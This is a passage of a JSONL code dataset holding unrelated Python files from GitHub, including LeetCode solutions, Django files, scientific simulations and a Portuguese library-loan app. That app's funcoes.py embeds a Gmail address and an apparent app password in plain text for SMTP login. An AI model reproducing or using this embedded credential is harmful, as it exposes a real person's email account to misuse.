code=end\n\n","repo_name":"hummingg/LeetCode","sub_path":"python/1991.找到数组的中间位置.py","file_name":"1991.找到数组的中间位置.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"72530390655","text":"# -*- coding: utf-8 -*- \n# leetcode time cost : 32 ms\n# leetcode memory cost : 13.5 MB\n# solution 2, math\n# G(n) = 卡塔兰数 C_n, C_0=1, C_(n+1) = 2*(2n+1)/(n+2) * C_(n+1)\nclass Solution(object):\n def numTrees(self, n: int) -> int:\n C = 1\n for i in range(0, n):\n C = C * 2*(2*i+1)/(i+2)\n return int(C)\n\ndef main():\n num = 3 #expect is 5\n obj = Solution()\n result = obj.numTrees(num)\n print(\"return result is :\",result)\n \nif __name__ =='__main__':\n main() ","repo_name":"sky-dream/LeetCodeProblemsStudy","sub_path":"[0096][Medium][Unique_Binary_Search_Trees]/Unique_Binary_Search_Trees_2.py","file_name":"Unique_Binary_Search_Trees_2.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"71223766655","text":"#!/usr/bin/env python\nimport os\nimport sys\n\nif __name__ == \"__main__\":\n\n ENVIRONMENT = os.getenv('ENVIRONMENT')\n\n if ENVIRONMENT == 'STAGING':\n settings = 'staging'\n elif ENVIRONMENT == 'PRODUCTION':\n settings = 'production'\n else:\n settings = 'development'\n\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\",\n \"hangman.settings.{settings}\".format(settings=settings))\n\n from django.core.management import execute_from_command_line\n\n execute_from_command_line(sys.argv)\n","repo_name":"jpadilla/email-hangman","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"1413866231","text":"from bisect import bisect_right as upper_bound\n\ndef findMedian(A):\n R = len(A)\n C = len(A[0])\n mi = A[0][0]\n mx = 0\n for i in range(R):\n if (A[i][0] < mi):\n mi = A[i][0]\n if (A[i][C - 1] > mx):\n mx = A[i][C - 1]\n\n desired = (R * C + 1) / 2\n while(mi < mx):\n mid = mi + (mx - mi) // 2\n place = [0]\n\n for i in range(R):\n j = upper_bound(A[i], mid)\n place[0] = place[0] + j\n if (place[0] < desired):\n mi = mid + 1\n else:\n mx = mid\n return mi\n\n\narr=[[1, 3, 5],[2, 6, 9],[3, 6, 9]]\np= findMedian(arr)\nprint(p)\n","repo_name":"tanu312000/pyChapter","sub_path":"org/netsetos/pyprep/ib/BinarySearch/matrix_median1.py","file_name":"matrix_median1.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21511480145","text":"from datetime import date\nrecipe_dict = {\n 'ehsf': [2161, 138, 154, 61],\n 'csf': [4000, 315, 153, 501],\n 'chili': [3567, 265, 146, 311],\n 'bs': [3510.280, 145, 271],\n 'gccs': [3316, 328, 82, 295],\n 'ss': [3869, 282, 134, 380],\n 'sj': [5841, 352, 138, 788],\n 'gsq': [2951, 298, 99, 314],\n 'ccc': [2805, 100, 51, 484],\n 'zb': [5177, 70, 244, 688],\n 'bb': [3024, 50, 109, 482]\n}\n\n\ntoday = date.today()\n\nhave_not_eaten_yet = {\n 'day': today,\n 'calories': 0,\n 'protein': 0,\n 'fats': 0,\n 'carbs': 0\n}\n\nclass person:\n def __init__(self, name, daily_weight, daily_macros, switch):\n self.name = name\n self.weight = daily_weight\n self.daily_macros = daily_macros\n self.switch = switch\n with open(\"{}_seven_day\".format(self.name),'r') as fptr:\n self.seven_day = fptr.readlines()\n #self.seven_day = [str(float(daily_weight)) + '\\n'] * 7\n #with open(\"{}_seven_day\".format(self.name), 'w') as fptr:\n #fptr.write(''.join(self.seven_day))\n \nMarshall = person(\"stormcount20\", 185, have_not_eaten_yet, 0)\nJosie = person(\"NoniRex\", 195, have_not_eaten_yet,0)\n\nperson_dict = {'stormcount20': Marshall, 'NoniRex': Josie}\n","repo_name":"b2marshall/fitbot","sub_path":"recipes.py","file_name":"recipes.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70370046337","text":"from django import forms\n\nfrom .models import challengePost, challengeComment\n\n\nclass challengeCreateForm(forms.Form):\n title = forms.CharField(\n widget=forms.TextInput(\n attrs={\n 'class': 'form-control-file',\n }\n )\n )\n\n text = forms.CharField(\n widget=forms.Textarea(\n attrs={\n 'class': 'form-control-file',\n }\n )\n )\n\n def save(self, *args, **kwargs):\n post = challengePost.objects.create(\n title=self.cleaned_data['title'],\n text=self.cleaned_data['text'],\n **kwargs,\n )\n\n return post\n\n\nclass challengeCommentForm(forms.ModelForm):\n class Meta:\n model = challengeComment\n fields = [\n 'content',\n\n ]\n widgets = {\n 'content': forms.Textarea(\n attrs={\n 'class': 'form-control',\n 'rows': 2,\n }\n )\n }\n","repo_name":"jeonyh0924/NBAproject","sub_path":"app/challengepost/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3137677244","text":"__author__ = '562474'\n\nfrom troposphere.ec2 import VolumeAttachment,Volume,Instance\nfrom troposphere import AWS_REGION,FindInMap, Ref, GetAtt,constants\n\nimport mappings\n\n\ndef volumeAttachment_helper(volume,instance, device='/dev/xvdb'):\n\n return VolumeAttachment(volume.title+\"Attachment\",\n InstanceId=Ref(instance),\n VolumeId=Ref(volume),\n Device=device)\n\n\ndef create_and_attach_volume(template,title, instance,device='/dev/xvdb', **kwargs):\n \n # if 'VolumeType' not in kwargs:\n # kwargs['VolumeType']=\"gp2\"\n if 'Size' not in kwargs:\n kwargs['Size']=str(20)\n if type(kwargs['Size']) is not basestring:\n kwargs['Size']=str(kwargs['Size'])\n if 'AvailabilityZone' not in kwargs:\n kwargs['AvailabilityZone'] = GetAtt(instance,'AvailabilityZone')\n v = template.add_resource(Volume(instance.title+title,**kwargs ))\n return template.add_resource(volumeAttachment_helper(v,instance,device))\n\n","repo_name":"Israt-Sharmin/Jenkins-elk","sub_path":"cf_scripts/template_helpers.py","file_name":"template_helpers.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"31414542989","text":"class Solution:\n def minimumSum(self, num: int) -> int:\n # get the four digits\n digit1=num%10\n digit2=int(num%100/10) # int() can round down\n digit3=int(num%1000/100)\n digit4=int(num%10000/1000)\n \n # combination\n # as the expected output is only the min sum, no need to get all the combinations. Only get the pair which can give the min sum\n\n # put the four digits in a list and sort them\n digitList= [digit1, digit2, digit3, digit4] \n digitList.sort() # ascending order\n\n # the two smallest digits will be on the ten's digit\n num1=10*digitList[0]+digitList[2]\n num2=10*digitList[1]+digitList[3] \n\n\n return num1+num2\n\n\n\nsol=Solution()\nprint(sol.minimumSum(4009))\n","repo_name":"HuachenZH/Python_leet","sub_path":"Math/2160.py","file_name":"2160.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71906229695","text":"'''\nWill tensorflow merge two calculation nodes into one?\nExample: tf.log(tf.sigmoid(x)) = - tf.nn.softplus(-x)\nAuthor: Li-Ping Liu \n'''\n\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport numpy as np\nimport time\n\n# allocate an np array \nsize = int(1e5)\nscale = 10 # if scale is large enough, log(sigmoid(X)) will fail\nnpX = (np.random.rand(size) - 0.5) * scale \n\n# calculate log(sigmoid(X)) in two different ways \nX = tf.constant(npX)\nY1 = tf.log(tf.sigmoid(X))\nY2 = - tf.nn.softplus(- X)\n\n\n# computation\nsession = tf.Session()\n\n# calculation with graph log(sigmoid(x))\nt1_start = time.clock()\n\nnpY1 = session.run(Y1)\n\nt1_calculation = time.clock() - t1_start\nprint(\"Calculation of log(sigmoid(X)) takes time %f seconds.\" % t1_calculation)\n\n\n# calculation with graph - softplus(- x)\nt2_start = time.clock()\n\nnpY2 = session.run(Y1)\n\nt2_calculation = time.clock() - t2_start\nprint(\"Calculation of - softplus(-X) takes time %f seconds.\" % t2_calculation)\n\nprint(npY1.shape)\nprint(np.argmax(npY1 - npY2))\n\nprint(np.mean(np.abs(npY1 - npY2)))\n\n# conclusion: tensorflow will not merge nodes in computational graph\n","repo_name":"lipingliulp/benchmark-tensorflow","sub_path":"merge_computation.py","file_name":"merge_computation.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12187773534","text":"import PySimpleGUI as sg\nimport sys\nimport re\nimport pandas as pd\nimport smtplib\nfrom smtplib import SMTPException\n\n\ndef cadastrar_usuario(nome, email):\n # Cria um DataFrame com os dados do usuário\n df_usuario = pd.DataFrame({\"Nome\": [nome.lower()],\n \"Email\": [email.lower()]})\n\n # Carrega a planilha existente ou cria um novo arquivo\n try:\n df_planilha = pd.read_excel(\"usuarios.xlsx\")\n df_planilha = pd.concat([df_planilha, df_usuario], ignore_index=True)\n except FileNotFoundError:\n df_planilha = df_usuario\n\n # Salva os dados na planilha\n df_planilha.to_excel(\"usuarios.xlsx\", index=False)\n\n\ndef validar_email(email):\n # Expressão regular para validar o formato do e-mail\n padrao_email = r\"[^@]+@[^@]+\\.[^@]+\"\n return re.match(padrao_email, email) is not None\n\n\ndef verificar_usuario(nome, email):\n # Função para verificar cadastro\n try:\n # Carregar planilha\n df_planilha = pd.read_excel(\"usuarios.xlsx\")\n # Verificar se o usuario está presente na planilha\n usuario_encontrado = df_planilha[(df_planilha[\"Nome\"] == nome.lower())\n & (df_planilha[\"Email\"] ==\n email.lower())]\n if not usuario_encontrado.empty:\n return True\n except FileNotFoundError:\n pass\n\n\ndef verificar_usuario_cadastrado(nome, email):\n try:\n df_planilha = pd.read_excel(\"usuarios.xlsx\")\n usuario_encontrado = df_planilha[\n (df_planilha[\"Nome\"] == nome.lower()) &\n (df_planilha[\"Email\"] == email.lower())\n ]\n return not usuario_encontrado.empty\n except FileNotFoundError:\n return False\n\n\n# Função para enviar e-mails\ndef enviar_email(destinatario, assunto, corpo):\n # Configurações do remetente e servidor SMTP\n remetente = \"projetofinal.python@gmail.com\"\n senha = \"ozcgrtuowtzcnuka\"\n servidor_smtp = \"smtp.gmail.com\"\n porta_smtp = 587\n\n # Constrói a mensagem de e-mail\n mensagem = (f\"Subject: {assunto}\\n\\n{corpo}\")\n\n try:\n # Estabelece uma conexão com o servidor SMTP\n with smtplib.SMTP(servidor_smtp, porta_smtp) as servidor:\n # Inicia a criptografia da conexão\n servidor.starttls()\n\n # Realiza a autenticação no servidor\n servidor.login(remetente, senha)\n\n # Codifica a mensagem para utf-8\n mensagem = mensagem.encode(\"utf-8\")\n\n # Envia o e-mail\n servidor.sendmail(remetente, destinatario, mensagem)\n\n # Exibe mensagem de sucesso\n print(\"Email enviado com sucesso!\")\n\n except SMTPException as erro:\n # Trata exceções que possam ocorrer durante o envio\n print(f\"Erro ao enviar email: {erro}\")\n\n\ndef devolver_livro(nome, email):\n # Lê o arquivo \"usuarios.xlsx\" e verifica se há informações de livro\n # relacionadas ao usuário atual\n arquivo_excel = \"usuarios.xlsx\"\n planilha_nome = \"Sheet1\"\n df = pd.read_excel(arquivo_excel, sheet_name=planilha_nome)\n\n # Filtra as linhas do usuário atual\n linhas_usuario = df.loc[(df['Nome'] == nome) & (df['Email'] == email)]\n\n if len(linhas_usuario) == 0 or pd.isna(linhas_usuario['Título'].iloc[0]):\n sg.popup(\"Você não possui nenhum livro para devolver.\")\n return\n\n livros_a_devolver = []\n\n for index, row in linhas_usuario.iterrows():\n titulo = row['Título']\n autor = row['Autor']\n data = row['Data']\n genero = row['Gênero']\n\n livros_a_devolver.append(index)\n\n if len(livros_a_devolver) > 0:\n df.loc[livros_a_devolver,\n ['Título', 'Autor', 'Data', 'Gênero']] = ''\n df.to_excel(arquivo_excel, sheet_name=planilha_nome, index=False)\n else:\n sg.popup(\"Nenhum livro selecionado para devolver.\",\n keep_on_top=True, non_blocking=True)\n\n # Cria a janela para exibir as informações do livro e a opção de \"Devolver\"\n layout_devolucao = [\n [sg.Text(f\"Título: {titulo}\")],\n [sg.Text(f\"Autor: {autor}\")],\n [sg.Text(f\"Data: {data}\")],\n [sg.Text(f\"Gênero: {genero}\")],\n [sg.Button(\"Devolver\")],\n [sg.Button(\"Cancelar\")],\n ]\n\n janela_devolucao = sg.Window(\"Devolver Livro\", layout_devolucao,\n resizable=False, finalize=True)\n\n while True:\n evento, _ = janela_devolucao.read()\n if evento == sg.WINDOW_CLOSED or evento == \"Cancelar\":\n break\n\n if evento == \"Devolver\":\n # Remove as informações do livro do arquivo \"usuarios.xlsx\"\n filtro = (df['Nome'] == nome) & (df['Email'] == email)\n colunas = ['Título', 'Autor', 'Data', 'Gênero']\n # Atribui valores vazios às células correspondentes\n df.loc[filtro, colunas] = ''\n\n df.to_excel(arquivo_excel, sheet_name=planilha_nome, index=False)\n\n # enviar_email de aviso de devolução\n corpo_dev = f\"O livro {titulo}, foi devolvido com sucesso\"\n destinatario_dev = email\n enviar_email(destinatario_dev, \"Livro devolvido\", corpo_dev)\n\n sg.popup(\"Livro devolvido com sucesso!\",\n keep_on_top=True, non_blocking=True)\n sys.exit()\n\n janela_devolucao.close()\n\n\ndef adicionar_livro_escolhido(nome, email, titulo, autor, data, genero):\n # Cria um DataFrame com as informações do livro\n livro = {\n 'Nome': nome,\n 'Email': email,\n 'Título': titulo,\n 'Autor': autor,\n 'Data': data,\n 'Gênero': genero\n }\n\n # Salva o DataFrame na planilha \"usuarios.xlsx\"\n arquivo_excel = \"usuarios.xlsx\"\n planilha_nome = \"Sheet1\"\n\n try:\n df = pd.read_excel(arquivo_excel, sheet_name=planilha_nome)\n # Verifica se já existe uma linha com o mesmo nome e email\n linha_existente = df[(df[\"Nome\"] == nome) & (df[\"Email\"] == email)]\n\n if linha_existente.empty:\n # Adiciona uma nova linha ao DataFrame\n df = pd.concat([df, pd.DataFrame([livro])], ignore_index=True)\n\n else:\n # Atualiza a linha existente com as informações do livro\n indice = linha_existente.index[0]\n df.loc[indice] = livro\n\n except FileNotFoundError:\n\n df = pd.DataFrame([livro],\n columns=[\"Nome\",\n \"Email\",\n \"Título\",\n \"Autor\",\n \"Data\",\n \"Gênero\"])\n print(\"Arquivo 'usuarios.xlsx' não encontrado.\\\n Verifique se o arquivo existe.\")\n\n df.to_excel(arquivo_excel, sheet_name=planilha_nome, index=False)\n\n\ndef mostrar_informacoes_livro(titulo, autor, data, genero):\n botao_confirma_dev = [\n [sg.Button(\"Devolver\", size=(10, 1))],\n [sg.Button(\"Cancelar\", size=(10, 1))],\n ]\n\n layout_confirma_dev = [\n [sg.Text(f\"Título: {titulo}\")],\n [sg.Text(f\"Autor: {autor}\")],\n [sg.Text(f\"Data: {data}\")],\n [sg.Text(f\"Gênero: {genero}\")],\n [botao_confirma_dev]\n ]\n\n janela_confirma_dev = sg.Window(\"Informações do Livro\",\n layout_confirma_dev, finalize=True,\n resizable=False, size=(500, 150))\n\n while True:\n evento, _ = janela_confirma_dev.read()\n\n if evento == sg.WINDOW_CLOSED or evento == \"Cancelar\":\n janela_confirma_dev.close()\n return False\n elif evento == \"Devolver\":\n enviar_email(\n destinatario=[\"-EMAIL-\"],\n assunto=\"Informações do Livro\",\n corpo=f\"O livro {titulo} foi devolvido com sucesso.\"\n )\n return True\n break\n","repo_name":"jadir-figueiredo/Projeto_final","sub_path":"Projeto_biblioteca/funcoes.py","file_name":"funcoes.py","file_ext":"py","file_size_in_byte":7981,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11048730528","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gs\nimport pyfftw.interfaces.numpy_fft as fft\n\nnx = 256\nny = 256\n\nLx = 4e6\nLy = 4e6\n\nh0 = 100.\ng = 9.81\nnu = 0.\nf0 = 0.\n\nif (f0 > 0.):\n print('Rossby radius = {0} km'.format(1.e-3*(g*h0)**.5/f0))\n\nx = np.arange(0., Lx, Lx/nx)\ny = np.arange(0., Ly, Ly/ny)\n\nx_km = x/1000\ny_km = y/1000\n\nkx = 2.*np.pi/Lx * np.arange(0, nx//2+1)\nky = np.zeros(ny)\nky[0:ny//2+1] = 2.*np.pi/Ly * np.arange(0, ny//2+1)\nfor j in range(1, ny//2+1):\n ky[-j] = -ky[j]\n\nu = np.zeros((ny, nx))\nv = np.zeros((ny, nx))\nh = np.zeros((ny, nx)) + h0\n\n#nx_waves = 2.\n#ny_waves = 2.\n\n#h = np.sin(nx_waves*2.*np.pi*x[np.newaxis,:]/Lx) \\\n# * np.sin(ny_waves*2.*np.pi*y[:,np.newaxis]/Ly)\n\nradius = .5e6\nsigma = radius/6\nh = np.exp( - (x[np.newaxis,:]-Lx/2)**2 / (2.*sigma**2) - (y[:,np.newaxis]-Ly/2)**2 / (2.*sigma**2) )\nh += h0\n\n## RANDOM FIELD\ndef generate_random_field(a_std):\n # the mean size of the perturbation.\n k1 = nx//16\n \n # the variance in wave number of perturbation\n ks2 = 2.**2.\n \n arnd = 2.*np.pi*np.random.rand(ny, nx//2+1)\n afftrnd = np.cos(arnd) + 1j*np.sin(arnd)\n # calculate the radial wave numbers\n l = np.zeros(afftrnd.shape)\n for j in range(0, ny//2+1):\n for i in range(0, nx//2+1):\n l[j,i] = (i**2 + j**2)**.5\n for j in range(ny//2+1,ny):\n for i in range(0, ny//2+1):\n l[j,i] = (i**2 + (ny-j)**2)**.5\n \n # filter on radial wave number using a gaussian function\n #fftfilter = zeros(sfft.shape, dtype=np.complex)\n factor = np.exp(-(l-k1)**2 / (2.*ks2))\n \n # create a line for plotting with the spectral bands\n #factork = linspace(0., 25., 1000)\n #factory1 = fac1*exp(-(factork-k1)**2. / (2.*ks2))\n #factory2 = fac2*exp(-(factork-k2)**2. / (2.*ks2))\n \n # create the filtered field\n afft = factor*afftrnd\n \n # make sure the mean is exactly 0\n afft[0,0] = 0.\n \n a = fft.irfft2(afft)\n \n # normalize the variance to 1\n a *= a_std/np.std(a)\n return a\n\n#h = generate_random_field(1.) + h0\nq = generate_random_field(1.)\n\nnt = 172800\ndt = 100.\nt = 0.\n\n# Set all variables in Fourier space.\nu = fft.rfft2(u)\nv = fft.rfft2(v)\nh = fft.rfft2(h)\nq = fft.rfft2(q)\n\ndef pad(a):\n a_pad = np.zeros((3*ny//2, 3*nx//4+1), dtype=np.complex)\n a_pad[:ny//2,:nx//2+1] = a[:ny//2,:]\n a_pad[ny:3*ny//2,:nx//2+1] = a[ny//2:,:]\n return (9/4)*a_pad\n\ndef unpad(a_pad):\n a = np.zeros((ny, nx//2+1), dtype=complex)\n a[:ny//2,:] = a_pad[:ny//2,:nx//2+1]\n a[ny//2:,:] = a_pad[ny:3*ny//2,:nx//2+1]\n return (4/9)*a\n\ndef calc_prod(a, b):\n a_pad = pad(a)\n b_pad = pad(b)\n\n ab_pad = fft.rfft2( fft.irfft2(a_pad) * fft.irfft2(b_pad) )\n return unpad(ab_pad)\n\n#def calc_prod(a, b):\n# return fft.rfft2( fft.irfft2(a) * fft.irfft2(b) )\n\ndef calc_rhs(u, v, h, q):\n u_tend = - 1j * kx[np.newaxis,:] * calc_prod(u, u) \\\n - 1j * ky[:,np.newaxis] * calc_prod(v, u) \\\n - g * 1j * kx[np.newaxis,:] * h \\\n + f0 * v \\\n #- nu * (kx[np.newaxis,:]**2 + ky[:,np.newaxis]**2) * u\n v_tend = - 1j * kx[np.newaxis,:] * calc_prod(u, v) \\\n - 1j * ky[:,np.newaxis] * calc_prod(v, v) \\\n - g * 1j * ky[:,np.newaxis] * h \\\n - f0 * u \\\n #- nu * (kx[np.newaxis,:]**2 + ky[:,np.newaxis]**2) * v\n h_tend = - 1j * kx[np.newaxis,:] * calc_prod(u, h) \\\n - 1j * ky[:,np.newaxis] * calc_prod(v, h) \\\n - calc_prod(h, 1j * kx[np.newaxis,:] * u + 1j * ky[:,np.newaxis] * v) \\\n #- nu * (kx[np.newaxis,:]**2 + ky[:,np.newaxis]**2) * h\n #+ fft.rfft2((200./86400)*fft.irfft2(q)) \\\n\n q_tend = - 1j * kx[np.newaxis,:] * calc_prod(u, q) \\\n - 1j * ky[:,np.newaxis] * calc_prod(v, q) \\\n #- nu * (kx[np.newaxis,:]**2 + ky[:,np.newaxis]**2) * q\n\n return u_tend, v_tend, h_tend, q_tend\n\noutput = True\nn_out = 1\nfor n in range(nt):\n if (output and n%n_out == 0):\n h_plot = fft.irfft2(h)-h0\n q_plot = fft.irfft2(q)\n\n print('{0}'.format(n//n_out))\n\n plot_grid = gs.GridSpec(3,1)\n plt.figure(figsize = (6,9))\n plt.subplot(plot_grid[0:2])\n plt.pcolormesh(x_km, y_km, h_plot, vmin=-0.3, vmax=0.6)\n xx, yy = np.meshgrid(x/1000., y/1000)\n nq=4\n plt.quiver(xx[::nq, ::nq], yy[::nq, ::nq], fft.irfft2(u)[::nq, ::nq], fft.irfft2(v)[::nq, ::nq], scale=2., pivot='mid')\n #plt.pcolormesh(x_km, y_km, q_plot, vmin=-2, vmax=2)\n #plt.pcolormesh(x_km, y_km, q_plot)\n #plt.colorbar()\n plt.title('{0} d'.format(n*dt/86400))\n plt.subplot(plot_grid[2])\n plt.plot(x_km, h_plot[ny//2,:], label='{0}'.format(n//n_out))\n plt.ylim(-0.3, 1.1)\n plt.grid()\n plt.tight_layout()\n plt.savefig('figs/{0:08d}.png'.format(n//n_out), dpi=100)\n plt.close()\n\n u_tend1, v_tend1, h_tend1, q_tend1 = calc_rhs(u, v, h, q)\n u_tend2, v_tend2, h_tend2, q_tend2 = calc_rhs(u + dt*u_tend1/2, v + dt*v_tend1/2, h + dt*h_tend1/2, q + dt*q_tend1/2)\n u_tend3, v_tend3, h_tend3, q_tend3 = calc_rhs(u + dt*u_tend2/2, v + dt*v_tend2/2, h + dt*h_tend2/2, q + dt*q_tend2/2)\n u_tend4, v_tend4, h_tend4, q_tend4 = calc_rhs(u + dt*u_tend3 , v + dt*v_tend3 , h + dt*h_tend3 , q + dt*q_tend3 )\n\n u += dt * (u_tend1 + 2.*u_tend2 + 2.*u_tend3 + u_tend4) / 6.\n v += dt * (v_tend1 + 2.*v_tend2 + 2.*v_tend3 + v_tend4) / 6.\n h += dt * (h_tend1 + 2.*h_tend2 + 2.*h_tend3 + h_tend4) / 6.\n q += dt * (q_tend1 + 2.*q_tend2 + 2.*q_tend3 + q_tend4) / 6.\n\n","repo_name":"Chiil/smallprograms","sub_path":"shallow_water_2d/shallow_water_2d.py","file_name":"shallow_water_2d.py","file_ext":"py","file_size_in_byte":5598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15491416167","text":"#! /usr/bin/env python\n\nfrom glob import glob\nimport os\nimport time\n\nfrom matplotlib.animation import FuncAnimation\nimport matplotlib.pyplot as plt\nimport matplotlib.transforms\nimport numpy as np\nimport pandas as pd\n\nimport mymodule as my\n\nstart_time = time.perf_counter()\nthis_file = os.path.basename(__file__)\nfile_name = this_file.split(\".\")[0]\n\n# Options\n\ntitles = [\"Production of $\\it{B}$\",\n \"Byproduct help\",\n \"Fitness\",\n \"Fitness deficit\"]\nvmaxs = [my.a2max,\n my.a2max,\n my.wmax,\n my.wmax]\n\ngivens = np.linspace(0., 1., num=42)\nmovie = True\nplotsize = 4\n\n# Add data to figure\n\ndef update(given, artists):\n a2 = my.a2eq(given, AA, RR)\n w = my.fitness(a2, a2, given, AA, RR)\n dif = wsocial - w\n artists[0].set_array(a2)\n artists[1].set_array(a2*given)\n artists[2].set_array(w)\n artists[3].set_array(dif)\n if movie:\n fig.texts[2].set_text(f\"Given {given*100:.0f}%\")\n return artists.flatten()\n\n# Data\n\nnr = 513\nnc = nr\nalphas = np.linspace(my.alphamax, my.alphamin, num=nr)\nlogess = np.linspace(my.logesmin, my.logesmax, num=nc)\nrhos = 1. - 1./pow(2., logess)\nRR, AA = np.meshgrid(rhos, alphas)\na2social = my.a2eq(0., AA, RR)\nwsocial = my.fitness(a2social, a2social, 0., AA, RR)\n\n# Figure properties\n\nwidth = plotsize*len(titles) - 2.\nheight = plotsize\nxlabel = \"Substitutability of $\\it{B}$\"\nylabel = \"Influence of $\\it{B}$\"\nbiglabel = plotsize*6\nletterlabel = plotsize*5\nticklabel = plotsize*4\nxticks = [0, nc/2 - 0.5, nc - 1]\nyticks = [0, nr/2 - 0.5, nr - 1]\nxmin = my.logesmin\nxmax = my.logesmax\nymin = my.alphamin\nymax = my.alphamax\nxticklabels = [f\"{xmin:.0f}\",\n f\"{(xmin + xmax)/2.:.0f}\",\n f\"{xmax:.0f}\"]\nyticklabels = [f\"{ymax:.1f}\",\n f\"{(ymin + ymax)/2.:.1f}\",\n f\"{ymin:.1f}\"]\nplt.rcParams[\"pdf.fonttype\"] = 42\nplt.rcParams[\"ps.fonttype\"] = 42\n\n# Create figure\n\nfig, axs = plt.subplots(nrows=1,\n ncols=len(titles),\n figsize=(width, height))\nplt.subplots_adjust(top=0.80, bottom=0.25, wspace=0.3)\n\nleft_x = axs[0].get_position().x0\nright_x = axs[-1].get_position().x1\ncenter_x = (left_x + right_x) / 2.\ntop_y = axs[0].get_position().y1\nbottom_y = axs[0].get_position().y0\ncenter_y = (top_y + bottom_y) / 2.\nfig.supxlabel(xlabel,\n x=center_x,\n y=bottom_y*0.2,\n fontsize=biglabel)\nfig.supylabel(ylabel,\n x=left_x*0.4,\n y=center_y,\n fontsize=biglabel)\n\nox = 0/72.\noy = 0/72.\noffset = matplotlib.transforms.ScaledTranslation(ox, oy, fig.dpi_scale_trans)\n\nletterposition = 1.035\nfor i, ax in enumerate(fig.get_axes()):\n ax.set(xticks=xticks, yticks=yticks)\n ax.set(xticklabels=[], yticklabels=[])\n for axis in [\"top\", \"bottom\", \"left\", \"right\"]:\n ax.spines[axis].set_linewidth(0.1)\n letter = ord(\"a\") + i\n ax.text(0,\n letterposition,\n chr(letter),\n transform=ax.transAxes,\n fontsize=letterlabel,\n weight=\"bold\")\naxs[0].set_yticklabels(yticklabels, fontsize=ticklabel)\nfor c, title in enumerate(titles):\n axs[c].set_title(title, pad=plotsize*7, fontsize=letterlabel)\n axs[c].set_xticklabels(xticklabels,\n fontsize=ticklabel)\n for label in axs[c].xaxis.get_majorticklabels():\n label.set_transform(label.get_transform() + offset)\n\nif movie:\n fig.text(right_x,\n bottom_y*0.2,\n f\"Given\",\n fontsize=biglabel,\n color=\"grey\",\n ha=\"right\")\n\n# Assign axs objects to variables\n# (AxesImage)\n\nartists = np.empty_like(axs) \ndummy_Z = np.zeros((nr, nc))\nframes = givens\n\nfor c, title in enumerate(titles):\n artists[c] = axs[c].imshow(dummy_Z,\n vmin=0,\n vmax=vmaxs[c])\n\n# Add data and save figure\n\nif movie:\n ani = FuncAnimation(fig,\n update,\n frames=frames,\n fargs=(artists,),\n blit=True)\n ani.save(file_name + \".mp4\", writer=\"ffmpeg\", fps=10)\nelse:\n update(frames[-1], artists,)\n plt.savefig(file_name + \".png\", transparent=False)\n\nplt.close()\n\nend_time = time.perf_counter()\nprint(f\"\\nTime elapsed: {(end_time - start_time):.2f} seconds\")\n","repo_name":"marcefuentes/gnr","sub_path":"bin/nonetheorymov.py","file_name":"nonetheorymov.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28384257985","text":"headers = {\r\n \"Content-Type\": \"application/json\"\r\n}\r\n\r\norder_body = {\r\n \"firstName\": \"Иосиф\",\r\n \"lastName\": \"Сталин\",\r\n \"address\": \"Москва, ул. Ленина, 1\",\r\n \"metroStation\": 4,\r\n \"phone\": \"+7123456789\",\r\n \"rentTime\": 1,\r\n \"deliveryDate\": \"2023-06-06\",\r\n \"comment\": \"no pasaran\",\r\n \"color\": [\r\n \"BLACK\"\r\n ]\r\n}\r\n\r\n","repo_name":"EvgeniaGlazovskaya/Glazovskaya_Evgenia_diplom","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27450954579","text":"from typing import Set\r\n\r\nINT = \"int\"\r\nFLOAT = \"float\"\r\nSTRING = \"str\"\r\nBOOLEAN = \"bool\"\r\nLIST = \"list\"\r\nNONE = \"None\"\r\n\r\ntypes: Set[str] = {INT, STRING, FLOAT, BOOLEAN, LIST, NONE}\r\n\r\n\r\ndef getWrongTypes(ans: str) -> Set[str]:\r\n return types - set((ans,))\r\n","repo_name":"CSTools-UCD/moodle-trace-generator","sub_path":"parser/python/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"4163901578","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport tensorflow as tf\nimport sys\nimport random\nimport collections\n\n\n### 1. 读取数据\n\ncontent = \"\"\nwith open('./belling_the_cat.txt') as f:\n content = f.read()\n\nwords = content.split()\nprint (words)\n\ndef build_dataset(words):\n count = collections.Counter(words).most_common()\n# print (\"count\", count)\n\n ## 构建正向字典\n dictionary = dict()\n for word, _ in count:\n dictionary[word] = len(dictionary)\n\n ## 构建反向字典\n reverse_dictionary = 